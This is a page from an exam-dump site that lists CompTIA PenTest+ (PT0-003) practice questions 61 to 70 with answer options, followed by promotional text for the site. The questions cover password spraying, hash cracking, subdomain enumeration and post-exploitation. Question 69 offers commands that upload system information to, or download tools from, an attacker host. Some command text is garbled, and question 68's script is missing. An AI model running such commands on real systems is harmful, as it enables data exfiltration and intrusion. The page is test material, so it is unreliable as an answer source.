PT0-003 Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :404 Q&As
  • Last Updated
    :Jun 01, 2026

CompTIA PT0-003 Online Questions & Answers

  • Question 61:

    A penetration tester identified numerous flaws that could lead to unauthorized modification of critical data.

    Which of the following would be best for the penetration tester to recommend?

    A. Flat access
    B. Role-based access control
    C. Permission-based access control
    D. Group-based control model

  • Question 62:

    A penetration tester is searching for vulnerabilities or misconfigurations on a container environment.

    Which of the following tools will the tester most likely use to achieve this objective?

    A. Nikto
    B. Trivy
    C. Nessus
    D. Nmap

  • Question 63:

    A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings, and high-level statements.

    Which of the following sections of the report would most likely contain this information?

    A. Quality control
    B. Methodology
    C. Executive summary
    D. Risk scoring

  • Question 64:

    A penetration tester is preparing a password-spraying attack against a known list of users for the company "example". The tester is using the following list of commands:

    pw-inspector -i sailwords -t 8 -S pass

    spray365.py spray -ep plan

    users="~/user.txt"; allwords="~/words.txt"; pass="~/passwords.txt"; plan="~/spray.plan" spray365.py generate --password-file $pass --userfile $user --domain "example.com" --execution-plan

    $plan

    cew -m 5 "http://www.example.com" -w sailwords

    Which of the following is the correct order for the list of the commands?

    A. 3, 4, 1, 2, 5
    B. 3, 1, 2, 5, 4
    C. 2, 3, 1, 4, 5
    D. 3, 5, 1, 4, 2

  • Question 65:

    User credentials were captured from a database during an assessment and cracked using rainbow tables.

    Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

    A. MD5
    B. bcrypt
    C. SHA-1
    D. PBKDF2

  • Question 66:

    Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?

    A. Keeping both video and audio of everything that is done
    B. Keeping the report to a maximum of 5 to 10 pages in length
    C. Basing the recommendation on the risk score in the report
    D. Making the report clear for all objectives with a precise executive summary

  • Question 67:

    A penetration tester performs a Man-in-the-Middle attack on an internal network and receives NTLMv2 hashes from multiple hosts.

    Which tool should the tester use NEXT to attempt offline password cracking?

    A. John the Ripper
    B. sqlmap
    C. Nikto
    D. BloodHound

  • Question 68:

    A penetration tester is trying to execute a post-exploitation activity and creates the follow script:

    Which of the following best describes the tester's objective?

    A. To download data from an API endpoint
    B. To download data from a cloud storage
    C. To exfiltrate data over alternate data streams
    D. To exfiltrate data to cloud storage

  • Question 69:

    A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

    Which of the following commands would help the tester START this process?

    A. certutil rlcache plit http://192.168.2.124/windows-binaries/accesschk64.exe
    B. powershell (New-Object System.Net.WebClient).UploadFile(`http://192.168.2.124/upload.php', `systeminfo.txt')
    C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
    D. wget http://192.168.2.124/windows-binaries/accesschk64.exeaccesschk64.exe

  • Question 70:

    A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com.

    Which of the following is the best command for the tester to use?

    A. nslookup mydomain.com ?/path/to/results.txt
    B. crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com
    C. dig @8.8.8.8 mydomain.com ANY ?/path/to/results.txt
    D. cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.